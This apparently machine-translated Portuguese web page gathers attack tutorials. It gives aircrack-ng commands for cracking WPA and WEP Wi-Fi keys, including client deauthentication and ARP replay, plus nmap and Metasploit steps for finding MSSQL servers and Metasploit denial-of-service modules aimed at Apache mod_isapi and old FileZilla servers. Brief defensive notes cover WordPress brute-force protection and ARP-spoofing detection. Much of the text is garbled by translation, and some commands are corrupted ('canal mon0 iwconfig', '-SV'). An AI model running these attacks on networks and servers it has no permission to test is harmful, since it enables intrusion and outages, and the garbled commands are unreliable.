Criar um Site Grátis Fantástico
Translate this Page



ONLINE
2





Partilhe esta Página



Total de visitas: 131965
ataque
ataque

 'ataque'

Ataque WPA PSK

Ataque WPA PSK com suíte aircrack-ng .

Posicione a placa wireless em modo monitor

airmon-ng start wlan0

Detectar tudo sem fio AP do e clientes disponíveis

airodump-ng mon0

Definir canal adaptador

canal mon0 iwconfig < channel_number >

Capturando a quatro way handshake

airodump-ng --channel < channel_number > --bssid < bssid > --write capture mon0

Você pode capturar o aperto de mão passivamente (leva tempo) ou de-autenticar um cliente.

De-ataque autenticação

aireplay-ng - deauth  3  -a  < BSSID >  -c  < client_mac > mon0

Força bruta

aircrack-ng -w passwords.lst capture de 01.cap

 

Ataque WEP Autenticação Falso

Ataque autenticação falsa Wep com pacote Aircrack-ng .

Posicione a placa wireless em modo monitor

airmon-ng start wlan0

Detectar tudo sem fio AP do e clientes disponíveis

airodump-ng mon0

Definir canal adaptador

canal mon0 iwconfig < channel_number >

Capturar

airodump-ng --channel < channel_number > --bssid < bssid > --write capture mon0

clientes não conectados estão presentes, usamos ataque autenticação falsa

aireplay-ng - fakeauth  1000  -q  10  -a  < bssid >  -h  < source_mac_address > mon0

-Fakeauth usar o ataque autenticação falsa com um atraso de 1,000 milissegundos -q 10 send keepalives a cada 10 segundos

Lançamento ARP repetição ataque

aireplay-ng - arpreplay  -b  < bssid >  -h  < source_mac_address > mon0

Lançamento ARP repetição ataque

aireplay-ng - arpreplay  -b  < bssid >  -h  < source_mac_address > mon0

Produzir uma chave WEP

aircrack-ng captura-01.cap

 

WEP De-athentication ataque

Wep ataque de autenticação com suíte aircrack-ng .

Posicione a placa wireless em modo monitor

airmon-ng start wlan0

Detectar tudo sem fio AP do e clientes disponíveis

airodump-ng mon0

Definir canal adaptador

canal mon0 iwconfig < channel_number >

De-ataque autenticação

aireplay-ng - deauth  3  -a  < BSSID >  -c  < client_mac > mon0

Capturar e rachaduras (janela de console aberto novo)

airodump-ng --channel  < channel_number >  --write capture mon0

   

WordPress Global de força bruta ataque

Os últimos dias há uma contínua e altamente distribuída, ataque global sobre instalações WordPress em praticamente todos os host na existência. Este ataque é bem organizado e distribuído.

https://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/

https://blog.cloudflare.com/patching-the-internet-fixing-the-wordpress-br

Para proteger o seu blog,

  1. remover padrão de administração da conta e criar um novo com um nome diferente
  2. alterar sua senha de administrador
  3. instalar um plugin captcha

Como escolher uma senha segura do WordPress

Detectando um Microsoft SQL Server

Microsoft SQL Server (MSSQL) é um sistema de gerenciamento de banco de dados relacional (RFMD) usado para armazenar, recuperar e gerenciar informações. Tal como acontece com muitos produtos da Microsoft, o SQL Server tem muitas falhas de segurança. Vamos começar por identificar a execução de servidores SQL na rede.  

Descubra portas abertas MSSQL MSSQL está executando por padrão na porta 1433 . Para descobrir o SQL Server você pode usar o nmap ou módulo auxiliar do Metasploit.  

A maneira NMAP Para descobrir portas abertas MSSQL que executar o seguinte comando:

nmap  -sT  -SV  -Pn  -p  1433 192.168.200.133

Normalmente, os administradores, quando eles precisam de mais de uma instância do SQL Server que correm a  segunda instância na porta 1434.

nmap  -sT  -SV  -Pn  -p  1433 , 1434 192.168.200.133

 

Parâmetros: -sT : TCP conectar varredura -SV : Determine Serviço de Informação da versão -Pn : Ignore Anfitrião descoberta -p 1433,1434: porta de digitalização 1433 e 1434  

Digitalização de toda a rede:

nmap  -sT  -SV  -Pn -open -p  1433 , 1434 192.168.200.0 / 24

 

Parâmetros: -aberto : Mostrar apenas as portas abertas  

A forma como Metasploit Metasploit oferece módulo auxiliar mssql_ping . Este módulo descobre a execução de serviços de MSSQL. Para usá-lo, digite:

usar auxiliary/scanner/mssql/mssql_ping

 

Tipo:

show options

para uma lista de opções disponíveis.  

Para descobrir todos os serviços MSSQL rodando na rede, definir Rhosts valor igual a 192.168.200.0 / 24, assumindo que a sua rede de destino é neste intervalo, aumentar tópicos valor para uma varredura mais rápida e executar o módulo.  

Publicado na revista Hakin9 em 25 de outubro de 2012

Detectar ARP spoofing

ARPON é um daemon manipulador portátil que fazer protocolo ARP seguro, a fim de evitar o Man In The Middle ataque através de ARP Spoofing, ARP Poisoning ou ARP Cache Veneno Routing ataques (APR). Ele bloqueia também os ataques derivados por isso, que Sniffing, Sequestro, Injection, Filtragem e ataques de colegas para mais ataques derivados complexos, como: DNS Spoofing, WEB Spoofing, Session Hijacking e SSL / TLS Hijacking e ataques de colegas.

sudo  apt-get install arpon

Arpwatch monitores Morada tráfego Resolution Protocol em uma rede de computadores. Ele gera um registo de emparelhamento observado de endereços IP com endereços MAC, juntamente com um carimbo de tempo, quando o emparelhamento apareceu na rede. Ele também tem a opção de enviar um e-mail a um administrador quando um mudanças emparelhamento ou é adicionado.

sudo  apt-get install arpwatch

Arpwatch avisa se ​​detectar qualquer perigo e ARPON avisa, mas também bloqueia o ataque.

Ataques de negação de serviço com Metasploit

Um ataque (denial-of- DoS ) é uma tentativa de fazer uma máquina ou recurso de rede indisponível para os seus usuários.

O Apache HTTP Server Apache httpd foi o servidor web mais popular na internet desde abril de 1996. Trata-se de milhares de linhas de código e uma grande variedade de módulos e extensões. Portanto, vulnerabilidades não poderia faltar. Extensão Apache, mod_isapi implementa a Internet Server Extension API. Ele permite que as extensões Internet Server para ser servido pelo Apache para Windows. Metasploit móduloapache_mod_isapi desencadeia uma vulnerabilidade na extensão mod_isapi Apache. Para acionar esta vulnerabilidade, o servidor de destino deve ter um módulo ISAPI instalado e configurado. Ao fazer um pedido, que termina de forma anormal, mod_isapi irá descarregar a extensão ISAPI. Mais tarde, se outra solicitação vem para esse módulo ISAPI, os ponteiros previamente obtidos serão utilizados, resultando em uma violação de acesso ou execução de código potencialmente arbitrária. Para utilizar este tipo de módulo,

usar auxiliary/dos/http/apache_mod_isapi

Tipo

show options

para visualizar uma lista de opções disponíveis. Depois de ter definido as opções, executar o módulo.

FileZilla FTP Servidor FileZilla é um cliente FTP de código aberto e software de servidor, distribuído gratuitamente sob os termos da GNU General Public License. É um software muito popular. No Windows, FileZilla é comumente usado como um servidor. Metasploit está oferecendo dois módulos auxiliares para realizar ataques DoS contra Windows com FileZilla Server instalado.

filezilla_admin_user provoca uma condição de negação de serviço no FileZilla FTP Server Administration Interface em versões 0.9.4d e anteriores. Para selecioná-lo digite

usar auxiliary/dos/windows/ftp/filezilla_admin_user

filezilla_server_port provoca uma condição de negação de serviço nas versões FileZilla FTP Servidor 0.9.21  e anteriores. Para selecioná-lo digite

usar auxiliary/dos/windows/ftp/filezilla_server_port

  Este post é parte de meu artigo sobre Metasploit que foi publicado originalmente em PenTest Revista ,edição de agosto .